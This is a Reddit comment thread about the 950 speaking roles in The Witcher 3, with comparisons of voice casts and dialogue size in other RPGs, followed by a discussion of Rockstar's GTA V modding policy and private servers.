950!? What did Oblivion have, 15 or so total? VA in games has come a long way.

edit: the article states 950 "speaking roles." I'm pretty sure some voice actors must have handled multiple, perhaps many dozens of roles. There weren't 950 voice actors. There were 950 distinct roles. That makes more sense because I swear every other male was Warden Blackwall from DA:I. they got Tywin Lannister to do the emperor. here's the [list](http://www.imdb.com/title/tt2993508/fullcredits?ref_=tt_cl_sm#cast) Charles Dance is so good at playing royalty. he's a fkn boss Damn 77 voice actors still? Most doing a single character, just wow. Yeah, great thing I love Blackwall's voice. Dude has one of the best "medieval asshole" voices ever. I often just walk around my house talking like Blackwall. "Guess the Wardens forgot to vacuum again, fucking Darkspawn" Hey man, if you can pull of at least a half-decent Blackwall, I won't judge. Is he also the nights watch trainer guy in the telltale game of thrones? Here in the UK he seems to be getting more non-game work - specifically lots of Sky Sports adverts. It's a bit odd hearing boxing advertised by the man who broke my heart. I mean... my inquisitor's heart. 

Ahem. Is that the same guy as the "advice head in a box" in RTW:2?  Guy has a booming, shakespearian voice that's really excellent..but its so excellent its impossible to not recognize he's about 10% of male characters in the game. It sure has, Oblivion had [18 VA](http://www.uesp.net/wiki/Oblivion:Voice_Actors) and Skyrim had [over 70.](http://www.uesp.net/wiki/Skyrim:Voice_Actors) [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] You couldn't really tell in Skyrim though. I remember one example with the Thieves Guild questline, the main villain has that voice actor with the raspy voice, just after talking to him you are tasked with talking to someone who can help bring him down, and this new guy has the same voice actor. Then you talk to someone else in the same or the next quest with the same voice actor. And then Belethor in Whiterun has the same voice actor too. I really think they used only a few voice actors for most characters and used a bunch for just special characters. The worst were the beggars for me. They'd beg with an East London accent, and then move to a doddery old lady if you say anything else to them. Honestly if they had just instituted a random pitch and timbre adjustment for all the 'throwaway' actors that would just tweak it a HAIR it would help.

But the real solution is hiring more voice actors. Bethesda makes fucking tons of cash off the Elder Scrolls games, but they seemingly refuse to actually reinvest it INTO THE GAMES. They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game. &gt; They're all still ugly when they come out, have shit writing, poor animations, and the same five voice actors they had in their last game.

Been noticing a lot of Skyrim hate on Reddit over the last few months, and I don't fully understand why. It is almost universally regarded as one of the best games of all time...can we really pick it apart and call it shit so easily? 

Skyrim definitely wasn't ugly at the time of its release, nor is it now. It was never Crysis 3, but it didn't pretend to be either. Even if it was middle of the pack graphically, that's by no means ugly. Same with writing. Bethesda games can struggle with pacing because of the open world design, but there are plenty of interesting and engaging quests in Skyrim. Even if we say that, on average, the writing in Skyrim was fairly mediocre, that's a far cry from "shit". 

Anyway, you're entitled to an opinion of course. But I find it hard to justify such a hyperbolic critique of Skyrim. Maybe the game wasn't to your tastes. But was it a poorly made cash grab as you're suggesting? Definitely not.  After playing it daily for 4 years, the fault really start to become apparant. Such trash! This is exactly the actual problem here. People put x-hundred hours into Skyrim and then say "oh, what a garbage game." It has definite faults, and things that grate on me, but god damn if it doesn't still pull me in. I can get lost in that game like I can with few others.  2/10, would not play again. Until I pick it up in a month and put another 300 hours in.  &gt; there are plenty of interesting and engaging quests in Skyrim

I've played a lot of Skyrim, and I really do like the game, but I have to disagree there. There were barely any interesting quests, especially compared to Oblivion or Morrowind. The vast majority of quests ended up being "get to the end of this dungeon", and most of those dungeons were filled with nothing but draugr. Even the guild questlines were often like this. There were a few that were done well - the Cidna Mine questline and the Frostflow lighthouse quest come to mind - but for the most part, the quests were very bland.
 Great games deserve to be criticized for their flaws. Skyrim is a monolithic game, just fucking awesome. But it has poor balance between Mage/Melee combat (high end Melee is just way better than being a Mage). The stealth elements could be better. The intro is drawn out and clashes with the open world environment of the game. And of course the endless bugs on and after launch. 

Great game, obviously has flaws. We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.  &gt; We're seeing more of those flaws be discussed because the game is getting older and not everyone looks at everything through rose tinted glasses even if they love it.

That's a fair point. But many of these criticisms don't come in the same form as your post (i.e. "Skyrim is a great game, *but*...), and are completely out of proportion with the reality of things. That's what I'm objecting too. These over-the-top claims that Skyrim is completely garbage. 

No game is perfect, and Skyrim especially. It launched with more than its fair share of flaws, some of which mods can't even fix. But the game isn't broken. It isn't "borderline unplayable". No single element of it is "complete trash". These are incredible exaggerations that add no value to worthwhile discussions about the game. 

Obviously we can cut out the praising bit if we're critiquing the game. You don't need to pay Skyrim a compliment before you point out a flaw. But it's the hyperbole that is the problem in these discussions. Probably because Skyrim is so popular and well-respected, people feel the need to pretend like its the worst and most overrated game of all time when they critique it. And that's not fair to anyone. It discredits the complaint of the poster, and it devalues earnest discussions about the game.  Is it really universally regarded as one of the best games of all time? I've heard that particular opinion very rarely. Most people I've talked to found it pretty boring and disappointing, preferring the other games in the series to Skyrim. Depending on how much stock you give to ratings, according to metacritic Skyrim is tied for 3rd best of all time on Xbox 360, 9th best game of all time on PC, and ranks 21st for PS3 (probably reflecting the poor quality of the port, but still no slouch of a score at 92/100). By all accounts that is universal critical accliam.

Let's say that review scores are biased though, and padded by outlets that give out a lot of 10/10's for major releases. Skyrim is still the [~25th best selling game of all time](http://en.wikipedia.org/wiki/List_of_best-selling_video_games), and would likely rank higher on that list if we disqualified games bundled with consoles, etc. 

But lets say that sales don't justify how good a game is and look at how frequently the game is played instead. At the time of this post, [Skyrim ranked as the 10th most popular game on Steam with over 38,000 players](http://store.steampowered.com/stats/). *And this is for a game that was released in 2011*. Even the Witcher 3, which has similarly been showered with accolades since it launched last week, only ranks 5th on that list, with about 63,000 players. Only 3 games on that list are older than Skyrim: Team Fortress 2, Civilization 5, and Garry's mod. And I'd say that the first 2 of those 3 games equally qualify for "classic" status, not unlike Skyrim. 

Let's not forget that Skyrim is singleplayer too, with no online component. So while we might ascribe its enduring popularity to its active mod community, let's not forget that this is probably the most successful singleplayer game of the past 5 years, and note that it's stayed alive and culturally relevant despite refraining from the usual tactics to keep players tethered to the game. 

**TL;DR: Yeah, I'd say it is pretty easy to substantiate Skyrim's status as one of the best games of all time. Almost by any criteria, be it financial, critical, or cultural impact, Skyrim sits near the top on just about any list**   Skyrim wasn't all that bad looking when it came out. I think you overestimate what console games looked like 4 years ago if you think that.

I totally agree about the pitch and timbre adjustment, though; it's something I've thought about before and I don't see why games don't try that. If you hire talented voice actors who can do different types of voices, you should be able to get a ton of different sounding characters out of one guys voice. [deleted] Nah, Karliah had a very distinctive voice, as did most important characters. and Arnold Schwarzenegger [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] And Farkas! Don't forget Farkas! The voice actor is my best friends uncle. He signed a picture of a screenshot of Farkas and called me on the phone to tell me I'm a whelp for my birthday.  Thanksgiving must be interesting for your friend. Everyone is gathered around the table when suddenly:

"Some people don't think I'm smart. Those people get my fist. But you, I like." They got Max Von Sydow for that blade guy who's name escapes me. Esburn. But his voice seems to change completely half way through or something...dunno if it was an actor or vocal change [deleted] [deleted] [deleted] Syria had 70?! More like 5 &gt; Syria had 70?!

That's an interesting autocorrect. Haha just upgraded my phone. Still have to struggle to type duck Wait, duck or duck? Does "speaking role" really translate to voice actor? Because the latter is not mentioned in the game. There is definitely a massive amount of voice actors in the game and I haven't noticed any obvious duplicas (like the actor in Skyrim who did Farkas and every other nord), but I guess that "speaking role" means NPC with unique dialogue rather than voice actors. &gt; and I haven't noticed any obvious duplicas

There's that peasant guy that sounds like he has throat cancer, the one that tells Keira how ill their cow is when you first go to her house, pretty sure I've heard him a few times The really throaty guy who sounds like Ralph Ineson? The game is fully voiced in 7 languages. I assume you can divide the voice actors at least on that number. I don't get why everyone is arguing over this when there are freaking credits in the game.

Here are the credits, time tagged at the voice acting part, starting with english.

https://youtu.be/3LJj2cY3FZ8?t=304

Maybe it took 950 people total for ALL languages. Hmm, it lists 19 voice actors for the English localization, and 8 additional actors under "Additional Voice Overs (Trolls)" at 7:20.

Anyone notice any other English VO credits?

edit: Looks like 7 languages with voice actors, for a possible total of 141 voice actors.  I'm not seeing any additional voice actor credits. [Polish website about actors](http://www.filmweb.pl/videogame/Wied%C5%BAmin+3%3A+Dziki+Gon-2015-678629/cast/actors) shows 39 actors in Polish version and 25 in English. It's 3rd party source and it's possible the list isn't full. Yeah but one good voice actor can fulfill dozens of different roles. Like 80% of the characters on the Simpsons are voiced by two guys. Grey DeLisle has done like 300 roles.

The voice actors in Elder Scrolls games sound like they aren't even professional voice actors. They just do some silly accent in their normal speaking voice and that's all they know what to do.

  There's this voice which I'm 95% sure is Ralph Ineson, and I hear him all over the place. That's actually my biggest gripe. I hear that guy absolutely everywhere. I've no idea if it is Ralph Ineson but it sounds bang on exactly like him.

The other big problem I have with W3 is I see a LOT of the same faces. They almost always have different hair or whatever, but it's copy/paste the same face and it really takes me out of the game partially because W3 is a really well rendered and realized world and minor things like hearing the same voice actor repeatedly or seeing the same faces on different people is really jarring.

Brilliant game though. Seriously loving every minute. I saw that "950 actors" line and I burst out laughing. You can notice repeating voice actors all the time. Practically all skelligers are the same 3 people and there's some guy with a raspy voice that seemed to voice the entirety of whoreson's gang and like 90% of velen's and novigrad's peasantry.  Oh god that fucking guy with the raspy voice. I honestly don't mind most VA that use a similar voice for different character, but this fucking guy... It's impossible not to recognize his voice, they really shouldn't give him so many different characters. Let's not excuse Bethesda's pathetically lackluster investment in good writing and voice acting by claiming that VA in games has come a long way. From 15 in oblivion to over 70 voice actors in skyrim. And skyrim is nearly 4 years old. Sounds like a good improvement going on.  I'm really looking forward to what the next Elder Scrolls game can do in a couple years, with modern consoles and computers. There were voice acted games with far more voice actors for smaller and similar size scripts before Oblivion.  And yet they weren't as good or we would be talking about them instead of Oblivion. Or they were just different types of game.  The original "Gabriel Knight" game had a voice cast of about 20 people and that's a tiny game, comparatively speaking. There are many ways in which I could describe Oblivion's voice acting but 'good' is not one of them. How can a script be smaller yet similar size? I can't think of any of these games you seem to know of, except for Kotor maybe, which obviously had a pretty small cast, and used repeated "alien" dialog for  most other things. GTA might be the only game that rivals Elder Scrolls/Bioware RPGs in terms of voice acting, and that game is definitely the exception and far from the rule. For comparison SW:The Old Republic had around 200 voice actors and 200,000 lines. Not sure if there's a number for word count.

http://www.pcgamer.com/star-wars-the-old-republic-scoops-guinness-world-record-for-voice-acting/ Obvious MMO problems that game had aside, first time going through each story was super fun because of the voice acting. It was the best single player mmo I've ever played Playing it now f2p sucks because I just want the stories, and exp is cut for non subs so I have to grind to level when I just want to see how my inquisitor story ends up Because it should never have been an MMO. It should have been a single player RPG. RIP my hopes for KOTOR3 :( I just wanted to power through the main story but the mmo aspects made me need to do sidequests. funny how I've been hearing about they are doing a main quest xp boost promotion, I guess I wasn't the only one Yeah it's a 12x exp boost, essentially you can hit 55 or 60 by doing only the storyline quests. Almost pulled me back in until I saw all the micropayment stuff they bolted on. No real interest in going back to it unfortunately.  [deleted] [deleted] This just proves even more that cd projekt red spared no expense in making their game. I have played for over 60 hours and barely scratched its surface. Hopefully they are able to make the costs of production back in folds and come out with another game with such clear passion and love poured into it. I feel like a jerk for getting bored after about 10 hours.  I keep seeing these posts about all the dedication and hard work that went into a game that I'm struggling to enjoy. You shouldn't. The Witcher 3 is a great game, and a lot of effort was clearly put into creating it, but that doesn't mean that you need to like it. Not everyone will enjoy any one thing. If you don't like the Witcher, then don't force yourself to play it just because you feel like you SHOULD like it. If it's not for you, it's not for you, and that's ok. At the same time, there are some games that people have raved about that I tried to play only to quit a few hours in... then when I went back to try again a few months or years later I devoured it just like everyone else said they did.  Sometimes it just comes down to whether or not you're in the mood for a particular kind of game or any game at all at the time and the same often applies to books as well. So just keep in mind you can always come back to it later and when you eventually do, it might surprise you. Might just be expectation too. You go into a hype game expecting the world and make yourself keep playing even though you're not into it at the moment, and it's not scratching the itch for you. Then you come back ages later, not really expecting much from it, just to kill some time, and with expectations gone, you really enjoy it. I went out of my way to avoid hyping this game in my mind, I avoided just about all the lead-up teasing, news, anything related. 

It was like navigating a minefield, but it was worth it when I look back and think of all the times I got a new game just to be initially off-put by it not living up to my unrealistic expectations. 

I feel like I've been pleasantly surprised by new things, where I might have otherwise found those things underwhelming. Hype can definitely do that to me as well. For example Pillars of Eternity got ~5 hours of play time from me and is sitting there waiting for me to come back. I'm sure I will and I'll be really impressed by it but until then It'll be waiting.

Another was bioshock. Had to play that like 3 times to get through to the end.  Funnily enough it was the exact opposite for Pillars with me... I love, love, love BG1/BG2/IWD/IWD2/PS:T (and replay them all every few years) but for some odd reason I just couldn't get into the BG1 enhanced edition when it came out so it killed all the hype I had for Pillars.  But when I saw Pillars for cheap at GMG a little while ago I thought 'at that price why not give it a try'... 75 hours of playing in a week later and I just started my second play-through but this time on Path of the Damned . So I think you're spot on that hype has a lot to do with it too. I was one of the backers. Kind of over hyped it for me. I'll love it when I come back to it I'm sure.  Same, backed it almost immediately, yet have only put like 4-5 hours into it if that. Don't regret backing it, just not quite in the mood for such a game at the moment. I feel like once the winter months come along, I'll be ready for a nice long cRPG. You just described my experience with Mass Effect. I played the first one when it came out and was unimpressed, but I bought the trilogy last year and played the shit out of it. I loved every second!  I couldn't believe that I didn't like it to begin with That pretty much happened to me with Witcher 2. First time I played it about a year ago or 2, I thought it was OK, left after an hour or so.

Now re-downloaded it to prepare for W3 and I got fucking hooked. I simply couldn't stop playing it, completed it in 3 days (24 hours total, most were the first day), and I'll be honest here, I very well would've done it in 2 days if I could have.  This hits home with me regarding books and reading in general. I'm reading ASOIAF and I put the books down for like a year because I was bored, only to pick them back up a year later and devour them. Not every game is for everyone. Don't worry about not liking something that's popular. [deleted] [deleted] [deleted] [deleted] The Witcher seems like it's going to be one of those love it or hate it games. As someone who loves fantasy books the story and world is exactly my style, and as someone who loves Dark Souls the preparation and the simple on the surface combat really does it for me. That being said a lot of the game seems pretty clunky (movement in particular) and it relies heavily on cutscenes and dialogue, easy to see how some people are getting bored. I finished the bloody baron quest line and I just can't find the motivation to continue. I don't see the same game as, what seems like, literally everyone else. Any every time I mention this in anything about CDPR or Witcher, I get downvoted. Not every game is for everyone. I think it's a fucking brilliant game, but the inventory makes me want to gouge my eyes out. So does the swimming.

I also wish the "witcher stuff" was more important. Even on Death March I can faceroll 90% of encounters. Sword, Signs, or Alchemy, the build doesn't really matter once you get past about level 10. A tough encounter might make me use a couple potions, normally I just roll with a decoction or two. I wish I had to have oils and potions prepared for specific threats. I wish there was a bit more variety to boss monsters. I liked using the different bombs as alchemy, too bad the inventory system is awful. They need to add a hotkey bar for swapping bombs, or even just a "favorites" tab in the inventory. I spent more time in the inventory screen than I spent fighting as a bomb build.

Even with all of those gripes, this is my favorite game to come out in years. The stories, characters, and themes are just all fucking spot on. The side quests are *infinitely* better than the shit from dragon age or skyrim. Really it's the first RPG where I feel the open world and storylines were both just done fantastically well. The only other game that came close for me was Red Dead Redemption. The inventory and the amount of menus, as well as some of the janky and awkward animation. Also, falling 4 feet should not kill me. I have had several set backs because of this bullshit. Though the lack of a more recent save is my fault, but 4 feet? Really? This guy who was trained for years in swordplay and acrobatics, is unable to fall four feet without dying or at the very least losing tons of health. For fall damage, hit "B" or whatever your sidestep button is to roll when you hit the ground. You can fall a good distance without taking damage using that method.

But yeah, fall damage is a bit out of whack. He's got a bad knee, besides you can roll and essentially negate most fall damage.  Did you like the Baron questline? I loved it but absolutely hated the next portion of the game in Novigrad. It was extremely boring to me, but everything since then has been great again. Honestly there is no such thing as a game for everyone. Maybe your just not a fan of the genre or need to play game in a different way. Try going for side quests if you have not or if you have, just do main quests and explore world. Try changing your gameplay up and if you just cant get into it. Wait for a few mods or improvements to game and maybe you will enjoy it in a new light later on. Well they already have their next game, which is Cyberpunk 2077. But they won't be focusing on it for a couple years. And it shows. The Witcher 3 is an incredibly beautiful game, not just visually, but in so many other ways too. You hardly notice the difference from the main quest and the side quests since it all has so much depth and detail that blends so well into the fantastic game world. It's also one of the first games in a really long time that haven't made me feel like a "player" in a world that revolves around me. I really like how the sidequests in an area share their lore. 

Sure if you are in a hurry or don't bother for that sort of thing, they make for great stand alone tasks, but they often give subtle context to one another and tie each other's loose ends in unexpected ways. 

 And the length of the side quests is pretty good too, you can play 1 or 2 per sessions and have the equivalent of an episode of some fantasy series that doesn't exist. This is a big ass game. It's a shame that I'll probably never hear all the dialogue because it's extremely well written and acted.  It is about the same amount of text as the main Lord of the Rings Trilogy which sits about ~470000 words.

Witcher 3 has less text than Final Fantasy VII which has ~600000 words. But FF7 had zero voice acting, which adds up in time and costs very quickly. Where FF7 lacks in voice acting, it makes up for in convolution. What was convoluted about FF7? They explain things rather well and it was very straightforward. I played the game when I was like 9 and understood it just fine. I'm currently playing through FF VII for the first time ever and I'm about half-way through the second disc. For some reason it doesn't seem that the game has that much text in it or it's very well hidden unless you go exploring. FFVII is actually pretty famous for having a ton of secret cutscenes that very few people find on their first playthrough. A lot of them are pretty important to the story too concerning stuff like Aeris' parents or what happened to Cloud and Zack after the incident at Nibelheim. Then of course you have stuff like Yuffie's big sidequest in Wutai or Vincent's very existence. Not to mention all the various Golden Saucer dates. Barrett is my waifu! Why would the dialogue being well written and acted prevent you from hearing it all?!?!? Because the game is absolutely massive, I'll probably never get around to witnessing all the branches of the dialogue trees.  Hence my obsession exploring every inch of velen. Nearly 25 hours in and I'm about to enter Novigrad for the first time. 55 hours in here. Haven't left for Skellige yet. Half the map still covered in question marks. It's so big I've resigned myself that I'll likely never finish it. I'll always have something new to see in it.  Even if you complete a 100% play through, you'll probably only see about a quarter of the script.  The rest is along paths that your choices veered away from.

That's where Story mode is going to be fun after you finish the first play through.  Check out some of those other paths the quick way. I'm telling myself it's totally okay to not do everything. Even though I'll still do everything by the end of it... The problem is that even if you explore every inch, you'll still miss dialogue due to the choice system. RPGs kill me. And the 36 different endings. I think the original guy was pointing out that your sentence was ambiguous, due to lack of grammar. [deleted] [deleted] In fairness, I don't see myself completing more than maybe 70% of the content. Not because I'll get bored, because its excellent, but there's just soooooo much. Uhhh does nobody care that the voice actor claim in the title is bullshit? It's 950 "speaking roles," not voice actors by a long shot. It's OP's vault. The article says "950 roles" as in "950 different in-game voices/characters" not "950 actors in real life" but OP changed it to 950 actors. THIS is how you voice cast a sweeping, epic RPG! I'm a voice actor myself, and nothing takes me out of a game more than sloppy VO work, or when the same actors keep popping up over and over within one game. Bethesda should take note for their future projects-- yes it's expensive and time consuming to do this kind of audio direction, but for heaven's sake give some more actors work and hire more than 10 people to voice every single character in Tamriel.

The Witcher 3 benefits from this immensely-- every character feels unique and alive thanks to diverse and incredibly well directed voice talent, even random peasants become memorable! Even in Witcher 3 you start noticing lots of the same voice actors, especially the ones with very distinctive voices (that one very deep/hoarse male voice comes to mind). But then there's not really a way to avoid this. Though not using very distinctive voices for common peasants would help somewhat. 

Just a minor thing anyway, overall I'm very pleased with the VO work in this. I know exactly the voice you're talking about. I've only heard him on three or four characters but each time I recognize him, whereas I've probably heard other voices reused more times without noticing. The general merchant type's "Greetings" comes to mind here. The merchant archetype is basically as close as the Witcher series gets to Nurse Joy in terms of reused assets Bahahaha, you aren't paying attention to all the other NPCs? Because EVERY SINGLE peasant NPC who's not part of a large quest is reused numerous times. Hell, the little kids from the mandatory story quest in the bog are reused -- I think there are like 5 kids in the world. Also like one old peasant lady. I keep seeing the same character model for the little girl that Ciri meets all over the place. She even has the same line of idle dialog, something like "Thhhisstle... thistle!" and I'm like wait, shouldn't you be in the Baron's kitchen? Those voice actors you hear over and over in multiple roles can be incredibly important though. Like for Arkham City's mooks. I think there must be like, 4-5 main voices for them, but they make up most of the spoken lines, and they're extremely good at it. &gt;when the same actors keep popping up over and over within one game.

Well Witcher 3 has that happening very often, even more common in cities. You'll hear Letho's VA, Ivoreth's VA, and Roche's VA. Too be fair they try to spice up their voices in some degree most of the time, still their voices are just too recognizable. 

The most hilarious one is hearing Roche's VA come out of a generic soldier serving under Roche.
 I definitely noticed Iorveth a couple times. He's really just too distinctive to get away with being a random voice in the game. &gt; or when the same actors keep popping up over and over within one game. 

I've noticed two actors popping up multiple times. One of them being the same guy who voiced Roche in TW2. The other one I just remember clearly his rather deep voice. Either way, there's a bit of the same actors popping up over and over within one game. Understandable and I'm not bothered by it myself, but it's there.  Whoever did Warden Blackwall's voice from DA:I voices a lot of peasants in this game. He tries to vary his voice a little for each character so it's not obvious, but I picked it out pretty quick. Not that it's bad, he has a great voice for gruff characters. Blackwall is my favorite companion in that game.  I notice similarly constructed NPC faces popping up more frequently than I do voices that sound familiar.   Yeah, it was super jarring when at one point I, by coincidence, did two contracts back to back which were offered by identical women Haven't noticed it with adults, but I've seen the same 4 or 5 toddlers all around the world.  [deleted] Well, I wouldn't be surprised if the game had a huge amount of voice actors, but I highly doubt there are actually 950 individual people voicing all the characters.  I think OP misread the article when writing that title. Yes, god damn as much as I love Fallout 3, the VA was terrible most of the time, and every. single. male. character. had the same voice. I've been playing through Skyrim again and I've been noticing the VA that does Belethor is EVERYWHERE! His voice is great, but they definitely could have used him a little less. [deleted] Counting translations? Most likely. While not all voiced out, both Baldurs Gate 2 and Planescape: Torment had over 1,000,000 words of dialogue + text. I fucking love The Witcher 3, all the voice acting and facial cues are so damn good. Constantly while watching them talk I see a little raised eyebrow here, or a little slight tilt of their lip, little details that add so much to the character and tell you so much. I love how polished to game feels, CDProjekt Red should feel truly proud of what they've made And they did a long RPG without filling it with meaningless padding [deleted] [deleted] [deleted] I'm just surprised at learning an average novel is under 100k words.  That seems like it'd be a really light book, my favorite series averages ~300k per volume. What's your favorite series? Wheel of Time, by Robert Jordan.  The whole series is 14 books and a prequel novel, totals almost 4.4m words.  And to be fair, it does definitely drag on in a few spots, especially in the middle third of the series. Yeah, I've heard mixed things about it overall, like how one book was about beetles eating crops and nothing else or something along those lines. I was going to get into it around the time I head Sanderson was brought in to finish it, since I'm a big Sanderson fan, but it seemed like a huge commitment. Personally, I loved the series. The slow down in the middle was noticeable, but I think it's exaggerated by people who had to wait multiple years between books. [This post](https://www.reddit.com/r/Fantasy/comments/2d8cvb/yes_you_should_read_the_wheel_of_time/) is pretty good. I agree, the slowdown was noticable in the 5th book for me especially. The 2nd, 6th, and 12th books were my favorites overall. Good series and its easily worth getting through some of the slower parts as it builds up the events really well. Its a huge commitment but worth it if you are a fan of the fantasy genre. The 2nd book is what really hooked me. I liked the first book enough to give the 2nd book a try. And the 2nd book was amazing, it really got its hooks in me then. I recommend it. A Song of Ice and Fire has something like that per volume I think. AGOT, ACOK, and AFFC are all around 300k.

ASOS and ADWD are above 400k. Yeah, I was going to say "roughly four novels... or one Brandon Sanderson novel", haha. Us sci-fi/fantasy fans get lots of massive doorstoppers. Holy crap. Also, for reference, National Novel Writing Month has a cutoff at 50,000 words for a novel classification. Wikipedia lists 40,000. So, it could also be called 9 novels worth of script. Which, as someone who has done 50k, is a staggering number.  Yeah, but you wouldn't spend 100 hours+ reading a novel, and even if you did it wouldn't be as repetitive and "normal" as the 100,000 lines used in a game.  It's what I love about games.  Man I REALLY want to progress to the end of the story (I feel like I'm pretty close now) but at the same time I want to do these side quests because I feel like I will never touch them if I finish the game. I think I ended up missing an important character who I didn't kill at the end of Witcher 2 in one of these side quests. Was curious compared to something similar. Assuming [this wiki page](http://dragonage.wikia.com/wiki/Voice_cast_%28Inquisition%29) is correct, to this there are *only* 130 voiceover credits in Dragon Age: Inquisition.

The Witcher 3 has a lot of VAs. As others have mentioned, the article doesn't specify that all the voice actors are for the English version. That Dragon Age wiki page is only showing English voice actors. That's the number of VAs, not speaking roles like in the title. I suspect that they're counting any named character as a speaking role, and as others have said they do reuse a lot of VAs (but fair enough, so does every big game). [deleted] The auto-mod has ruined this thread. Personally would rather not see the shit spammed all over the place. Worse than the dumb shit it deleted? Is this more that the old republic? This is really awesome.

I was listening to a conversation ingame and was thinking how many hours went into the animation which we see during the conversations. Many of them are not just standing right in one place they move, sit down, wave their hands around and stuff. 

It seems simple but when you think about it, it makes a huge difference. a lot more immersive for me that Dragon Age's tilted camera They absolutely killed it in this game. Some cut scenes and dialogue is less memorable than others but there has been certain side quests that felt so well put together that it's nearly equaled what I've got out of other entire games. 

The PC version has definitely had some release hiccups and it's not a prefect game but what I do love is they don't treat the gamer like an idiot. You can play how you want, where you want. Shit is hard to figure out sometimes and it can be a difficult game but that's what I enjoy about it so much.  And it is so enjoyably worth it.

Honestly, this is the first open-world RPG that I have actually listened to the full dialogue interaction and not skipped "cinematically" -- let the (main story) voice actors state the first sentence or core sentiment of a part of a conversation, progress the conversation, repeat -- but listened to the entirety of the conversation even if it is as simple as getting some lady's pan out of a house.

The game has rough edges, but the size of it and the depth (I would say if Skyrim were a wading pool, Witcher 3 is a pool without a shallow end - neither is a good thing) as well as the quality in so many key areas for story (facial animations, writing, vocal delivery, content diversity and quality) makes this game arguably the best open world "medieval" RPG that I think has ever been made. [deleted] It was worth it.

I almost feel guilty for spending far too much on a new card and getting it for "free". I'm a cynic and it is **still** the best games in years if not decades. Does somebody know how long the german version took or 2.5 for every language ? What I wanna know in a couple of months: least picked options and least heard dialogue.

Would be nice if 6 months from now CDPR could come out and say": This many options have not been found by anyone anywhere.

Or something close to it. I'd like to know which audio codec TW3 uses. Since there's a ton of voice acting they'd probably go for something voice-specialized so it's probably not MP3 or Ogg. Speex maybe? one of the actors is the one that does the voice of Blackwall in Dragon Age, he does many voices and has that distinct accent [deleted] &gt; We have always appreciated the creative efforts of the PC modding community and we still fondly remember the awesome zombie invasion mod and original GTA map mod for GTAIV PC among many other classics. To be clear, the modding policy in our license has not changed and is the same as for GTAIV.  Recent updates to GTAV PC had an unintended effect of making unplayable certain single player modifications. This was not intentional, no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing. It also bears mentioning that because game mods are by definition unauthorized, they may be broken by technical updates, cause instability, or affect your game in other unforeseen ways.

Reply from Rockstar concerning mods in GTA 5. I just wish you could make your own game so you can fuck around with your friends with these mods. Freeze my character or something! The mods I have been seeing on youtube are hilarious and would be so much fun with your friends. A good solution for this would be dedicated servers, with filters for mod protection and whatnot. That's basically how it was in IV. It would say if a game was modded or not, and if you tried to join an unmodded game with mods, it wouldn't let you in. Why didn't they do that this time around, honestly? Was it just an oversight or something else? Because having people play on private servers with cheats/mods means people wouldn't be playing on their vanilla servers and therefore not buy their microtransactions. I assume it's only a matter of time before someone reverse engineers the server protocol and makes private servers available. Dude, look up FiveM it's already working. Working may loosely apply here. It's a long road before 5m is a contender for gtao. It's still fairly good considering how quickly they got anything working at all. Agreed that it will take a while before people leave GTAO for it. I think the subreddit for the most popular one is /r/fivem  Wow so after looking through that sub I think I'll wait on trying it. I think there's a couple multiplayer mods in the works.  It's always a matter of time private servers exist for dedicated MMO games like World of Warcraft, there isn't any logical reason they won't exist for GTAV Money is so easy to make I forgot they had micro transactions.  how do you make money? Heists with in-game crew/friends on hard. There's micro transactions un gtaV? You can buy GTA Dollar for money. It is like spending your vacation in a foreign country. you have to change your home-country currency into the foreign country currency and you always end up with less than before. It's like that but also you just went on vacation where everything you could ever want was free, all you had to do was walk or drive around and get it. exactly. Nobody knows about it because it's so useless. Literally nobody will pay for gta5 money because heists give you so fucking much it's ridiculous.

Heck if you read the article the first question is The real question is: on what are we going to spend the money from the Heists? (For those who have practically everything)  vens243 2 of the people I play with bought $100 worth of in game money. Trust me... People are buying it. Lots of people think it's because online mods would interfere with their p2w-esque system they go going on right now. I'm inclined to agree.  Online is, in no way, pay to win. It's incredibly balanced.  He's referring to the cash cards. I know.  Money means very little.  Level is the relevant factor as far as gear goes. Either way, less people on those servers means less money for Rockstar. Simple as that. It takes forever to get money to buy things imo.  I disagree, but my crew and I take heists a bit more seriously than most (without being assholes).  We're small, we practice and study them to find more skillful, more effective ways to win, and we just have fun with each other.  The money just appears. A dedicated crew will always be easier than pugging it, but a lot of people (probably MOST people) don't have a dedicated crew that plays at the same time and wants to do heists/missions every time. With that under consideration, it's a lot easier to get levels than make money.

You can level up all day on races or deathmatch, but without a reliable crew you can spend 3 hours, sometimes more, just to get 150k from a heist. My friends and I are too busy and on way different schedules so we can't effectively do heists and regular missions are boring and suck for money. Since the update we've only managed to do 3 heists =/ Me and my friends all tried the prison heist with random folks and we never got past like the 2nd mission. Then we all did it together and were able to knock out several heists pretty quickly. My guess is just how the whole system works. They wanted a very unique online experience with the whole leveling system and what not. Instead of having people find games to join they wanted EVERYONE to be able to work together quicker and find jobs quicker.  They could have a totally separate sandbox mode with no persistent characters, no missions, and no leveling. Just the open world with friends so you can fuck around Yea but they can't make money off of that. Except that they *did* make money off that. All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. And not only did Rockstar not delivery that functionality, but they are actively going to punish anyone pursuing it. But they don't see a way to keep making money off of it if they make it moddable online with private/dedicated servers. 

They don't want to make a one time payment they want what everyone else is doing, especially mobile gaming. In game purchases/DLC for everything. &gt; All the people who bought the game hoping to be able to fuck around with friends using mods paid money expecting to be able to do just that. 

